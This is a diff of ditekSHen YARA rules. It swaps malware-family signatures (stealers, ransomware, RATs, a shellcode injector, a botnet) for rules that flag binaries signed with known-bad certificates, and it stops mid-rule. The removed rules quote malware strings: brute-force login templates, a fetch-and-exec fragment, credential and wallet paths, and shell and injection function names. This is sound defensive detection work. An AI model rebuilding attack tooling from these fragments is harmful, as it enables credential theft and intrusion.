-		$p8 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=drupalBrt" ascii
-		$p9 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=joomlaBrt" ascii
-		$p10 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=htpasswdBrt" ascii
-		$p11 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=magentoBrt" ascii
-		$p12 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=postgres_b" ascii
-		$p13 = "AUTH_FORM=Y&TYPE=AUTH&USER_LOGIN=%s&USER_PASSWORD=%s&Login=&captcha_sid=&captcha_word=" ascii
-		$p14 = "%qlog=%s&pwd=%s&wp-submit=Log In&redirect_to=%s/wp-admin/&testcookie=1" ascii
-		$p15 = "name=%s&pass=%s&form_build_id=%s&form_id=user_login_form&op=Log" ascii
-		$p16 = "username=%s&passwd=%s&option=com_login&task=login&return=%s&%s=1" ascii
-		$v1_1 = "brutC" fullword ascii
-		$v1_2 = "XmlRpc" fullword ascii
-		$v1_3 = "shouldRetry$" ascii
-		$v1_4 = "HttpC|%" ascii
-		$v1_5 = "ftpH%_" ascii
-		$v1_6 = "ssh%po" ascii
-		$v1_7 = "?sevlyar/4-da" ascii
+		thumbprint = "e3eff064ad23cc4c98cdbcd78e4e5a69527cf2e4"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and ( ( 2 of ( $x* ) and 3 of ( $s* ) ) or all of ( $s* ) or 6 of ( $w* ) or 6 of ( $p* ) or 6 of ( $v1* ) or 12 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Philippe Mantes" and pe.signatures [ i ] . serial == "2e:80:23:a5:a0:32:8f:66:65:6e:1f:c2:51:c8:26:80" )
 }
-rule DITEKSHEN_MALWARE_Win_Biopass_Dropper : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_38B0Eaa7C533051A456Fb96C4Ecf91C4 : FILE
 {
 	meta:
-		description = "Detects Go BioPass dropper"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "56037c79-59f7-587c-8f54-c9618e871f34"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "1133fb37-2616-5d95-83da-554d9a5a5373"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7088-L7111"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2560-L2571"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "06f3b3ee38349ddcf9be7cbb7627d60fa673962409dde6e4badd112841a3ed19"
+		logic_hash = "3ea8eaf1fc17075a8c1f34f9b1d8a987071d58a4b68bed70db763402a9a6de97"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$go = "Go build ID:" ascii
-		$s1 = "main.NetWorkStatus" ascii
-		$s2 = "main.NoErrorRunFunction" ascii
-		$s3 = "main.FileExist" ascii
-		$s4 = "main.execute" ascii
-		$s5 = "main.PsGenerator" ascii
-		$s6 = "main.downFile" ascii
-		$s7 = "main.Unzip" ascii
-		$url1 = "https://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/" ascii
-		$x1 = "SCHTASKS /Run /TN SYSTEM_CDAEMON" ascii
-		$x2 = "SCHTASKS /Run /TN SYSTEM_SETTINGS" ascii
-		$x3 = "SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST" ascii
-		$x4 = ".exe /install /quiet /norestart" ascii
-		$x5 = "exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\\''http" ascii
-		$x6 = "powershell.exe -Command $" ascii
-		$x7 = ".Path ='-----BEGIN RSA TESTING KEY-----" ascii
+		thumbprint = "8e2e69b1202210dc9d2155a0f974ab8c325d5297"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $x* ) or ( 1 of ( $url* ) and ( $go ) ) or 9 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marianne Septier" and pe.signatures [ i ] . serial == "38:b0:ea:a7:c5:33:05:1a:45:6f:b9:6c:4e:cf:91:c4" )
 }
-rule DITEKSHEN_MALWARE_Win_A310Logger : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_738Db9460A10Bb8Bc03Dc59Feac3Be5E : FILE
 {
 	meta:
-		description = "Detects A310Logger"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d2cf2f7b-5710-56ab-b13d-97a70fe7f618"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "3451fe9d-067a-57ea-9df1-35d427d8c71a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7113-L7149"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2573-L2584"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8205169c9c78eb784b9d07a5fd85ad3a54763452e1e315f7e7911b8ac49a6c01"
+		logic_hash = "6a7060f2a5867e9974cb01de516ef34fb367ef9acf88e2f63c97dd05b1676504"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		snort_sid = "920204-920207"
-
-	strings:
-		$s1 = "Temporary Directory * for" fullword wide
-		$s2 = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*RD_" wide
-		$s3 = "@ENTIFIER=" wide
-		$s4 = "ExecQuery" fullword wide
-		$s5 = "MSXML2.ServerXMLHTTP.6.0" fullword wide
-		$s6 = "Content-Disposition: form-data; name=\"document\"; filename=\"" wide
-		$s7 = "CopyHere" fullword wide
-		$s8 = "] Error in" fullword wide
-		$s9 = "shell.application" fullword wide nocase
-		$s10 = "SetRequestHeader" fullword wide
-		$s11 = "\\Ethereum\\keystore" fullword wide
-		$s12 = "@TITLE Removing" fullword wide
-		$s13 = "@RD /S /Q \"" fullword wide
-		$en1 = "Unsupported encryption" fullword wide
-		$en2 = "BCryptOpenAlgorithmProvider(SHA1)" fullword wide
-		$en3 = "BCryptGetProperty(ObjectLength)" fullword wide
-		$en4 = "BCryptGetProperty(HashDigestLength)" fullword wide
-		$v1_1 = "PW\\FILES\\SC::" wide
-		$v1_2 = "AddAttachment" fullword wide
-		$v1_3 = "Started:" fullword wide
-		$v1_4 = "Ended:" fullword wide
-		$v1_5 = "sharedSecret" fullword wide
-		$v1_6 = "\":\"([^\"]+)\"" fullword wide
-		$v1_7 = "\\credentials.txt" fullword wide
-		$v1_8 = "WritePasswords" fullword ascii
-		$v1_9 = "sGeckoBrowserPaths" fullword ascii
-		$v1_10 = "get_sPassword" fullword ascii
+		thumbprint = "4cf77e598b603c13cdcd1a676ca61513558df746"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 3 of ( $en* ) and 4 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $en* ) ) or 5 of ( $v1* ) or ( 4 of ( $v1* ) and 2 of ( $s* ) and 2 of ( $en* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jocelyn Bennett" and pe.signatures [ i ] . serial == "73:8d:b9:46:0a:10:bb:8b:c0:3d:c5:9f:ea:c3:be:5e" )
 }
-rule DITEKSHEN_MALWARE_Win_Crylock : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_141D6Dafed065980D97520E666493396 : FILE
 {
 	meta:
-		description = "Detects CryLock ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "296288d8-2fdd-592a-aef9-7d4853885594"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "1a2e44d7-b801-5c3e-bf74-616f211c6d93"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7151-L7186"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2586-L2597"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dde35dd2c7e89212c4562f2dcf6a78d06fbb3d31150d49e6c48f758b07f1834f"
+		logic_hash = "37ed05b7a472ec6cbc1bba453f3be9ca1bd590ed6470d6607873ef52b28e3ea5"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Encrypted by BlackRabbit. (BR-" ascii
-		$s2 = "{ENCRYPTENDED}" ascii
-		$s3 = "{ENCRYPTSTART}" ascii
-		$s4 = "<%UNDECRYPT_DATETIME%>" ascii
-		$s5 = "<%RESERVE_CONTACT%>" ascii
-		$s6 = "how_to_decrypt.hta" ascii wide
-		$s7 = "END ENCRYPT ONLY EXTENATIONS" ascii
-		$s8 = "END UNENCRYPT EXTENATIONS" ascii
-		$s9 = "END COMMANDS LIST" ascii
-		$s10 = "END PROCESSES KILL LIST" ascii
-		$s11 = "END SERVICES STOP LIST" ascii
-		$s12 = "END PROCESSES WHITE LIST" ascii
-		$s13 = "END UNENCRYPT FILES LIST" ascii
-		$s14 = "END UNENCRYPT FOLDERS LIST" ascii
-		$s15 = "Encrypted files:" ascii
-		$s16 = { 65 78 74 65 6e 61 74 69 6f 6e 73 00 ff ff ff ff
-                 06 00 00 00 63 6f 6e 66 69 67 00 00 ff ff ff ff
-                 (0a|0d 0a) 00 00 00 63 6f 6e 66 69 67 2e 74 78
-                 74 00 00 ff ff ff ff 03 00 00 00 68 74 61 }
-		$p1 = "-exclude" fullword
-		$p2 = "-makeff" fullword
-		$p3 = "-full" fullword
-		$p4 = "-nolocal" fullword
-		$p5 = "-nolan" fullword
-		$p6 = "\" -id \"" fullword
-		$p7 = "\" -wid \"" fullword
-		$p8 = "\"runas\"" fullword
-		$p9 = " -f -s -t 00" fullword ascii
+		thumbprint = "28225705d615a47de0d1b0e324b5b9ca7c11ce48"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 6 of ( $p* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ralph Schmidt" and pe.signatures [ i ] . serial == "14:1d:6d:af:ed:06:59:80:d9:75:20:e6:66:49:33:96" )
 }
-rule DITEKSHEN_MALWARE_Win_Deeprats : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_07Cf63Bdccc15C55E5Ce785Bdfbeaacf : FILE
 {
 	meta:
-		description = "Detects DeepRats ("
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5b774e24-3864-519f-9cfd-d729d7d567a0"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7bdc16ed-ff95-5e96-bfe9-ad326c77c82a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7188-L7218"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2599-L2610"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "511264c0b6932f90069a5206cd142ca7210b0bc40c51ef5aa9c41a161fb57aab"
+		logic_hash = "1fdd8f6535bf5a78fcd7e33475a650914053f1391fe04f885e9e5a84452bfe5a"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		hash1 = "1f8b7e1b14869d119c5de1f05330094899bd997fca4c322d852db85cbd9271e6"
-
-	strings:
-		$s1 = "https://freegeoip.live/json/https://myexternalip.com/rawin" ascii
-		$s2 = "github.com/cretz/bine" ascii
-		$s3 = "github.com/kbinani/screenshot" ascii
-		$s4 = "socks5://%s:%d" ascii
-		$s5 = "socks5://%s:%s@%s:%d" ascii
-		$s6 = "http://%s:%d" ascii
-		$s7 = "http://%s@%s:%d" ascii
-		$s8 = "%SystemRoot%\\system32\\--CookieAuthentication" ascii
-		$s9 = "tor_addr_" ascii
-		$f1 = ".GetVnc" ascii
-		$f2 = ".GetCommand" ascii
-		$f3 = ".GetPayload" ascii
-		$f4 = ".ListenCommands" ascii
-		$f5 = ".ReceiveFile" ascii
-		$f6 = ".RegisterImplant" ascii
-		$f7 = ".Screenshot" ascii
-		$f8 = ".SendFile" ascii
-		$f9 = ".StartShell" ascii
-		$f10 = ".UnregisterImplant" ascii
-		$f11 = ".VncInstalled" ascii
-		$f12 = ".PingPong" ascii
-		$f13 = ".ListenCMD" ascii
+		thumbprint = "3306df7607bed04187d23c1eb93adf2998e51d01"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or 8 of ( $f* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REITSUPER ESTATE LLC" and pe.signatures [ i ] . serial == "07:cf:63:bd:cc:c1:5c:55:e5:ce:78:5b:df:be:aa:cf" )
 }
-rule DITEKSHEN_MALWARE_Win_Gasket : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0382Cd4B6Ed21Ed7C3Eaea266269D000 : FILE
 {
 	meta:
-		description = "Detects Gasket"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3afa131d-9c88-50df-a3b4-552db4a84e69"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "ad4bc1bc-4d72-51bf-a22c-cd98f33f3931"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7220-L7250"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2612-L2623"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0279979915891fc8c813ba555120ee5705b53b234a808b5ca77bff35a082e376"
+		logic_hash = "7e8204f2ec30da73bc2eb83e065412c96e084d7ff5f8ab6125d643693d7407d1"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "main.checkGasket" ascii
-		$s2 = "main.connectGasket" ascii
-		$s3 = "/cert/trust/dev/stderr/dev/stdout/index.html" ascii
-		$f1 = ".SetPingHandler." ascii
-		$f2 = ".SetPongHandler." ascii
-		$f3 = ".computeMergeInfo." ascii
-		$f4 = ".computeDiscardInfo." ascii
-		$f5 = ".readPlatformMachineID." ascii
-		$f6 = ".(*Session).establishStream." ascii
-		$f7 = ".(*Session).handleGoAway." ascii
-		$f8 = ".(*Stream).processFlags." ascii
-		$f9 = ".(*Session).handlePing." ascii
-		$f10 = ".(*windowsService).Install." ascii
-		$f11 = ".(*windowsService).Uninstall." ascii
-		$f12 = ".(*windowsService).Status." ascii
-		$f13 = ".getStopTimeout." ascii
-		$f14 = ".DialContext." ascii
-		$f15 = ".WriteControl." ascii
-		$f16 = ".(*Server).authenticate." ascii
-		$f17 = ".(*Server).ServeConn." ascii
-		$f18 = ".(*TCPProxy).listen." ascii
-		$f19 = ".UserPassAuthenticator.Authenticate." ascii
-		$f20 = ".(*InfoPacket).XXX_" ascii
+		thumbprint = "e600612ffcd002718b7d03a49d142d07c5a04154"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 16 of ( $f* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LOOK AND FEEL SP Z O O" and pe.signatures [ i ] . serial == "03:82:cd:4b:6e:d2:1e:d7:c3:ea:ea:26:62:69:d0:00" )
 }
-rule DITEKSHEN_MALWARE_Win_Silentmoon : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_08653Ef2Ed9E6Ebb56Ffa7E93F963235 : FILE
 {
 	meta:
-		description = "Detects SilentMoon"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0b41a07b-0e2a-5bbf-8789-3b46460d2c09"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8883185a-8239-5648-bebc-3a4c3578a7d6"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7252-L7272"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2625-L2636"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1aa61e83d0003ef41d16fd40698485fdf41a957639ac3c3f2770994a43bd502a"
+		logic_hash = "b0e35f2dbd27de0dc9ea6ee7958c477e6a154bc4c8bb5484ba85ed5732502645"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
+		thumbprint = "1567d022b47704a1fd7ab71ff60a121d0c1df33a"
+		importance = 20
 
-	strings:
-		$s1 = "\\\\.\\Global\\PIPE\\" fullword wide
-		$s2 = "REMOTE_NS:ERROR:%d" fullword ascii
-		$s3 = "REMOTE:ERROR:%d" fullword ascii
-		$s4 = "COMNAP,COMNODE,SQLQUERY,SPOOLSS,LLSRPC,browser" fullword wide
-		$s5 = "Mem alloc err" fullword ascii
-		$s6 = "block %d: crc = 0x%08x, combined CRC = 0x%08x, size = %d" ascii
-		$x1 = "ACTION:UNSUPPORTED" fullword ascii
-		$x2 = "?ServiceMain@@YAXKPAPA_W@Z" fullword ascii
-		$x3 = "?ServiceCtrlHandler@@YGKKKPAX0@Z" fullword ascii
-		$x4 = "%d socks, %d sorted, %d scanned" ascii
-		$x5 = "GoldenSky" fullword wide
-		$x6 = "SilentMoon" fullword wide
-		$x7 = "internalstoragerpc" fullword wide
+	condition:
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Haw Farm LIMITED" and pe.signatures [ i ] . serial == "08:65:3e:f2:ed:9e:6e:bb:56:ff:a7:e9:3f:96:32:35" )
+}
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ddce8Cdc91B5B649Bb4B45Ffbba6C6C : FILE
+{
+	meta:
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "180b2e63-7151-5899-8c12-7e4cd3bb2e0d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2638-L2649"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "940d257253a0a1a3f70dcec1cb57e9ab08108138ce3b80c9f74228a8b702601c"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "23c446940a9cdc9f502b92d7928e3b3fde6d3735"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 3 of ( $x* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLIM DOG GROUP SP Z O O" and pe.signatures [ i ] . serial == "0d:dc:e8:cd:c9:1b:5b:64:9b:b4:b4:5f:fb:ba:6c:6c" )
 }
-rule DITEKSHEN_MALWARE_Win_Lu0Bot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4Af27Cd14F5C809Eec1F46E483F03898 : FILE
 {
 	meta:
-		description = "Detects Lu0Bot"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f8595553-b911-5e30-9ece-cad7d5913f19"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e7bbc10b-54fc-5950-99fc-80a459406780"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7274-L7285"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2651-L2662"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b4822248230a804b1dc75f8d517af28a621dab1746c9ef45eaa4754149ce0cba"
+		logic_hash = "0297f156d1e4d1c20143953759000b286ac9e1f8864aa511e0e2f8fa5c3eac7f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "WinExec" fullword ascii
-		$s2 = "AlignRects" fullword ascii
-		$o1 = { be 00 20 40 00 89 f7 89 f0 81 c7 a? 01 00 00 81 }
-		$o2 = { 53 50 e8 b0 01 00 00 e9 99 01 00 00 e8 ae 01 00 }
+		thumbprint = "5fa9a98f003f2680718cbe3a7a3d57d7ba347ecb"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4KB and 1 of ( $s* ) and all of ( $o* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DAhan Advertising planning" and pe.signatures [ i ] . serial == "4a:f2:7c:d1:4f:5c:80:9e:ec:1f:46:e4:83:f0:38:98" )
 }
-rule DITEKSHEN_MALWARE_Win_Shellcodedlei : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_105765998695197De4109828A68A4Ee0 : FILE
 {
 	meta:
-		description = "Detects shellcode downloader, executer, injector"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "62a4f141-87f8-596a-adf6-5bf9a50c9e91"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "97a4bad1-9b84-54e3-a1c2-6d01bd4cde4c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7287-L7304"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2664-L2675"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "064c17427ae6b33ffb09a14abcb924d20ead44250e8bd03070bf40869f1c812e"
+		logic_hash = "c251f28eec6f93522f5a3706e1abcfd892affa2b36ed84ec277dc0d4716ff667"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "PPidSpoof" fullword ascii
-		$s2 = "ProcHollowing" fullword ascii
-		$s3 = "CreateProcess" fullword ascii
-		$s4 = "DynamicCodeInject" fullword ascii
-		$s5 = "PPIDDynCodeInject" fullword ascii
-		$s6 = "MapAndStart" fullword ascii
-		$s7 = "PPIDAPCInject" fullword ascii
-		$s8 = "PPIDDLLInject" fullword ascii
-		$s9 = "CopyShellcode" fullword ascii
-		$s10 = "GetEntryFromBuffer" fullword ascii
+		thumbprint = "5ddae14820d6f189e637f90b81c4fdb78b5419dc"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cryptonic ApS" and pe.signatures [ i ] . serial == "10:57:65:99:86:95:19:7d:e4:10:98:28:a6:8a:4e:e0" )
 }
-rule DITEKSHEN_MALWARE_Win_Bluebot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_53F575F7C33Ee007887F30680486Db5E : FILE
 {
 	meta:
-		description = "Detects BlueBot"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cddd40bb-c3c6-5c44-9cb1-480571375be8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8353ac89-1d98-5b05-a851-50d9e42f8f74"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7306-L7333"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2677-L2688"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "04a19f649eb2fff7a5bc59ccead80cd0a04c4e5418cbc83e850045dba75b03e0"
+		logic_hash = "050d8c4dcb80cd637981c208c6d1316e9933d4f06bbf8af3717d2205a4f84f6d"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "Blue_Botnet" wide
-		$x2 = "5-START-http" ascii
-		$x3 = "*300-END-" ascii
-		$x4 = "botlogger.php" wide
-		$s1 = "//TARGET//" wide
-		$s2 = "//BLOG//" wide
-		$s3 = "MCBOTALPHA" wide
-		$s4 = "//IPLIST//" wide
-		$s5 = "Host: //BLOG//" wide
-		$s6 = "User-Agent: //USERAGENT//" wide
-		$s7 = "<string>//TARGET//</string>" wide
-		$s8 = "POST //URL// HTTP/1.1/r/n" wide
-		$v1 = "<attack>b__" ascii
-		$v2 = "PressData" fullword ascii
-		$v3 = "POSTPiece" fullword ascii
-		$v4 = /(load|tcp|udp)Stuff/ fullword ascii
-		$v5 = "isAttacking" fullword ascii
-		$v6 = "DoSAttack" fullword ascii
-		$v7 = "prv_attack" fullword ascii
-		$v8 = "blogList" fullword ascii
+		thumbprint = "a42d8f60663dd86265e566f33d0ed5554e4c9a50"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 5 of ( $s* ) or 5 of ( $v* ) or 9 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RET PTY. LTD." and pe.signatures [ i ] . serial == "53:f5:75:f7:c3:3e:e0:07:88:7f:30:68:04:86:db:5e" )
 }
-rule DITEKSHEN_MALWARE_Win_Unkcobaltstrike : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_7E89B9Df006Bd1Aa4C48D865039634Ca : FILE
 {
 	meta:
-		description = "Detects unknown malware, potentially CobaltStrike related"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "24ddccc7-3700-57a1-999c-ddefae6911bb"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "aa208da9-06e2-5bf5-8453-a545c640efa7"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7335-L7354"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2690-L2701"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2fb4e87eec3b56773b812ce6a5c28143183087e0f93d92d76c1103563f8e0891"
+		logic_hash = "825e4b69aec565b6ef6b4ac2394f5a562a84615e3c91331934fa378152635df4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "https://%hu.%hu.%hu.%hu:%u" ascii wide
-		$s2 = "https://microsoft.com/telemetry/update.exe" ascii wide
-		$s3 = "\\System32\\rundll32.exe" ascii wide
-		$s4 = "api.opennicproject.org" ascii wide
-		$s5 = "%s %s,%s %u" ascii wide
-		$s6 = "User32.d?" ascii wide
-		$s7 = "StrDupA" fullword ascii wide
-		$s8 = "{6d4feed8-18fd-43eb-b5c4-696ad06fac1e}" ascii wide
-		$s9 = "{ac41592a-3d21-46b7-8f21-24de30531656}" ascii wide
-		$s10 = "bd526:3b.4e32.57c8.9g32.35ef41642767~" ascii wide
-		$s11 = { 4b d3 91 49 a1 80 91 42 83 b6 33 28 36 6b 90 97 }
